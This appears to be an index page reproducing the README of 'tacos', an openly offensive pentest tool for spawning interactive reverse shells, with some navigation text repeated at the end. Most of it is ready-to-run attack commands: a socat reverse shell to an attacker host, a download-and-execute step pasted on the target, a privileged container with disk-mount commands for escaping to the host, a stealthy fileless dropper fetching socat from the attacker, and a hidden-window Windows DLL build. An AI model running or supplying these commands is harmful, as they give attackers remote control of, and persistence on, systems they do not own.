https://github.com/ariary/tacos

🌮 INTERACTIVE reverse shell everywhere! (Particularly digestible with socat multi-handler listener)
https://github.com/ariary/tacos

ctf golang infosec interactive pentest pentest-tool reverse-shell security socat

Last synced: about 1 year ago
JSON representation

🌮 INTERACTIVE reverse shell everywhere! (Particularly digestible with socat multi-handler listener)

Host: GitHub
URL: https://github.com/ariary/tacos
Owner: ariary
License: mit
Created: 2022-02-26T08:48:36.000Z (over 4 years ago)
Default Branch: main
Last Pushed: 2023-11-03T14:02:22.000Z (over 2 years ago)
Last Synced: 2025-04-04T17:11:41.337Z (about 1 year ago)
Topics: ctf, golang, infosec, interactive, pentest, pentest-tool, reverse-shell, security, socat
Language: Shell
Homepage:
Size: 3.28 MB
Stars: 29
Watchers: 1
Forks: 4
Open Issues: 5
Metadata Files:
- Readme: README.md
- License: LICENSE

Awesome Lists containing this project

README

# tacos 🌮
^{(reverse `socat`)}

Spawn a pty in your reverse shell to automaticaly make it interactive for socat listener.

Fast interactive reverse shell set-up [ 🐳 (container) ](#with-docker-recommended)

^{All credit goes to laluka idea}

Equivalent of:
```shell
socat exec:'bash -il',pty,stderr,setsid,sigint,sane OPENSSL:[ATTACKER_IP:PORT],verify=0
```

**Why ?**
* transform RCE to interactive reverse shell with almost no prerequisite (only `curl`)
* cross-platform *(windows support is OK but not yet interactive. It is recommended to use non-docker solution for it)*
* tired of hitting ^C and loosing your shell?
* too lazy to copy/paste/learn socat command
* target doesn't have `socat` and you don't want to do [this](#alternative)
* provide more advanced configuration to the tty (alias, etc)
* easier to obfuscate

## Usage

« I quickly want an interactive reverse shell», take a wrap! 🥙
```shell
# On attacker machine
tmux
wrap --lhost [ATTACKER_IP] #launch socat listener + output command to run on target

# On target
# paste command outputted by wrap: it will download tacos, and launch it to obtain the interactive revshell
```

🎁 Bonus n°1: expose listener to the world wide web

Useful if target can't directly reach the attacker machine, but has internet access

On attacker machine, install ngrok or bore and launch your listener:

wrap -n

N.B: ngrok is more stable than bore for now

### With docker (recommended)

Source aliases *(for simplicity)*:
```shell
alias tacos.container='docker run --net host --rm -it ariary/tacos'
```

Launch multi-handler listener:
```shell
tacos.container [LISTENING_ADDR] [LISTENING_PORT] # [OPTIONAL_TACOS_ARS]
```

***Notes about `tacos` container security:***
> From a networking point of view, this is the same level of isolation as if the processes were running directly on the host and not in a container. However, in all other ways, such as storage, process namespace, and user namespace, the process is isolated from the host.

🎁 Bonus n°2: `tacos` reverse shell image

Useful if target is running docker, kubernetes, etc ...

On attacker machine, launch your tacos listener as usual

On target:



docker run --privileged --rm -it ariary/tacos-reverse [TACOS_LISTENER_IP]:[TACOS_LISTENER_PORT]

💡: --privileged mode is not mandatory. It is used to allow container escaping with:
fdisk -l

mkdir /mnt/hostfs

mount /dev/sda1 /mnt/hostfs

💡: If you only have writing access to a manifest deploying containers. Use ariary/tacos-reverse image with appropriate arguments

## Easy install

* Requirements: go, git, tmux *(and ngrok, bore)*
* Install all the stuff: `./install-all-in-one.sh`

You're now good to go !:
```
tacos.listener
```

## Alternatives

Alternatively, if target does not have `socat`:
**Host** a [static](https://github.com/minos-org/minos-static/blob/master/static-get) version of `socat` binary and **download + execute it** using the stealthy [`filess-xec`](https://github.com/ariary/fileless-xec) dropper:
```shell
# On attacker machine
# get socat static & expose it
static-get socat
python3 -m http.server 8080

# On target machine
# Use already downloaded fileless-xec to download socat and stealthy launch it with argument
fileless-xec [ATTACKER_IP]:8080/socat -- exec:'bash -il',pty,stderr,setsid,sigint,sane OPENSSL:[ATTACKER_IP]:[SOCAT_LISTENING_PORT],verify=0
```

### Use dll instead of `.exe`
```shell
# On attacker machine:
# modify ./cmd/tacosdll/tacosdll.go with the according IP:PORT
$ GOOS=windows GOARCH=amd64 CGO_ENABLED=1 CC=x86_64-w64-mingw32-gcc go build -buildmode=c-shared -ldflags="-w -s -H=windowsgui" -o tacos.dll ./cmd/tacosdll/tacosdll.go

# On remote:
> rundll32.exe ./tacos.dll,Tacos
```

ecosyste.ms

Data

Tools

Indexes

Applications

Experiments

Awesome

https://github.com/ariary/tacos

Awesome Lists containing this project

README

🎁 Bonus n°1: expose listener to the world wide web

🎁 Bonus n°2: `tacos` reverse shell image

https://github.com/ariary/tacos

Awesome Lists containing this project

README

🎁 Bonus n°1: expose listener to the world wide web

🎁 Bonus n°2: tacos reverse shell image

🎁 Bonus n°2: `tacos` reverse shell image